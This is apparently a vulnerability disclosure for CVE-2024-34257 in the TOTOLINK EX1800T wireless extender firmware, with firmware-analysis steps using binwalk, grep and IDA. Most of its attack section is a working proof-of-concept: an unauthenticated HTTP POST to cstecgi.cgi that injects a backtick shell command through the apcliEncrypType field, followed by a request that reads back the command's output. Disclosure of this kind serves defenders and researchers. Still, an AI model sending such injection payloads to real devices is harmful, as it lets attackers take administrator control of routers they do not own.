1. Vulnerability description
The TOTOLINK EX1800T wireless extender has a vulnerability in the apcliEncrypType parameter of its firmware version V9.1.0cu.2112_B20220316 that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges.
2. Vulnerability recurrence
Equipment: TOTOLINK EX1800T
Firmware version: V9.1.0cu.2112_B20220316
Manufacturer website information: https://www.totolink.net/
Firmware address: https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/223/ids/36.html
Distribute CVE ID:CVE-2024-34257
Exploit POC:
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 127.0.0.1
Content-Length: 116
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset:utf-8
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/page/index.html?timestamp=1714114057910
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{
"token":"",
"apcliEncrypType":"`id>../test.txt`",
"topicurl":"setWiFiExtenderConfig"
}
View exploit results:
GET /test.txt HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
3. Vulnerability analysis
Use the binwalk tool to extract the firmware file system:
binwalk -Me TOTOLINK_C8341E_EX1800T_WX032_MT7621MT7915_SPI_16M128M_V9.1.0cu.2112_B20220316_ALL_Easymesh.web
Use the grep tool to quickly find vulnerability parameters:
grep -rl apcliEncrypType
Put the cstecgi.cgi file into the IDA tool for reverse analysis, trace the apcliEncrypType parameter to the LOAD:00408434 address, assign the parameter to $a1 and enter the sub_403600 function:
Following the sub_403600 function, we see that the v7 variable is formatted and brought into the CsteSystem function to execute system commands.
